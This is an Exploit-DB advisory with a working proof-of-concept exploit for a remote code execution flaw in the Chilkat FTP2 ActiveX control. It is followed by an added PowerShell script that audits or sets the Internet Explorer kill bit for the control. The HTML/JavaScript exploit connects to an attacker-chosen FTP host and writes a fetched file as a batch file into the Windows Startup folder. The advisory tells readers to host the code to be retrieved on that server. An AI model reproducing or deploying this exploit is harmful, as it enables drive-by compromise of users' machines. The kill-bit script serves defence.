Chilkat Software FTP2 – ActiveX Component Remote Code Execution

  • Author: rgod
    Date: 2010-12-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15866/
  • <!--
    Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
    by rgod
    tested against Internet Explorer 7 on Vista
    should also work with 8/9
    ActiveX Settings:
    CLSID: {302124C4-30A0-484A-9C7A-B51D5BA5306B}
    Progid: ChilkatFtp2.ChilkatFtp2.1
    Binary Path: C:\Windows\System32\CHILKA~2.DLL
    KillBitted: False
    Implements IObjectSafety: True
    Safe For Initialization (IObjectSafety): True
    Safe For Scripting (IObjectSafety): True
    
    This class allows copying/overwriting files inside arbitrary locations, e.g. via the GetFile()
    method. This code creates a batch file inside the automatic startup folder;
    set up an FTP server allowing anonymous connections and place the code you want
    to be retrieved.
    This control is also used by lots of freeware applications; it was not documented, so I posted it here.
    Note that previous versions have a different CLSID; I'm saying this for filtering purposes.
    -->
    <html>
    <object classid='clsid:302124C4-30A0-484A-9C7A-B51D5BA5306B' id='obj' />
    </object>
    <script>
    obj.UnlockComponent("suntzu"); //needed for file transfer operations, type whatever here
    obj.Port=21; //configure ftp connection
    obj.Hostname="192.168.0.1"; //change here
    obj.ConnectTimeout=5;
    obj.Passive=1;
    var x;
    x=obj.Connect(); 
    if (x==1){
    x = obj.GetFile("suntzu.txt","c:/Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/suntzu.bat"); //boom
    }
    obj.Disconnect();
    </script>
    
    original url: http://retrogod.altervista.org/9sg_chilkat.html
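
The advisory lists the control as "KillBitted: False" and marked safe for scripting, which is what lets a web page instantiate it. The following is an added example, not part of the original advisory or any Chilkat code: a PowerShell script that reports, and with the hypothetical `-Apply` switch sets, the Internet Explorer kill bit for the CLSID given above. It assumes the standard `ActiveX Compatibility` registry location and the `0x400` kill-bit flag; CLSIDs of other versions, which the advisory says differ, are not on this page and must be appended to the list once identified.

```powershell
# Added example: audit (default) or set (-Apply) the IE kill bit for the control on this page.
param([switch]$Apply)

# CLSID copied from the advisory; append the CLSIDs of other versions once identified.
$Clsids  = @('{302124C4-30A0-484A-9C7A-B51D5BA5306B}')
$KillBit = 0x400                      # "Compatibility Flags" bit that blocks instantiation in IE
$Name    = 'Compatibility Flags'
$Roots   = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    # View used by 32-bit IE on 64-bit Windows
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags([string]$Key) {
    # Returns the current flags, or 0 when the key or value does not exist.
    $p = Get-ItemProperty -LiteralPath $Key -Name $Name -ErrorAction SilentlyContinue
    if ($p) { [int]$p.$Name } else { 0 }
}

foreach ($root in $Roots) {
    # Skip a registry view whose Internet Explorer key is absent
    # (for example Wow6432Node on 32-bit Windows).
    if (-not (Test-Path -LiteralPath (Split-Path $root -Parent))) { continue }

    foreach ($clsid in $Clsids) {
        $key   = Join-Path $root $clsid
        $flags = Get-CompatFlags $key

        if ($Apply -and -not ($flags -band $KillBit)) {
            # Create the key only if absent: New-Item -Force on an existing key wipes its values.
            if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
            # Preserve any flags already present and add the kill bit.
            New-ItemProperty -LiteralPath $key -Name $Name -PropertyType DWord `
                -Value ($flags -bor $KillBit) -Force | Out-Null
            $flags = Get-CompatFlags $key
        }

        [pscustomobject]@{
            Key        = $key
            Flags      = '0x{0:X8}' -f $flags
            KillBitSet = [bool]($flags -band $KillBit)
        }
    }
}
```

Run without arguments to audit; `-Apply` writes under HKLM and needs an elevated session. The kill bit only stops Internet Explorer from loading the control and does not affect applications that load the DLL directly.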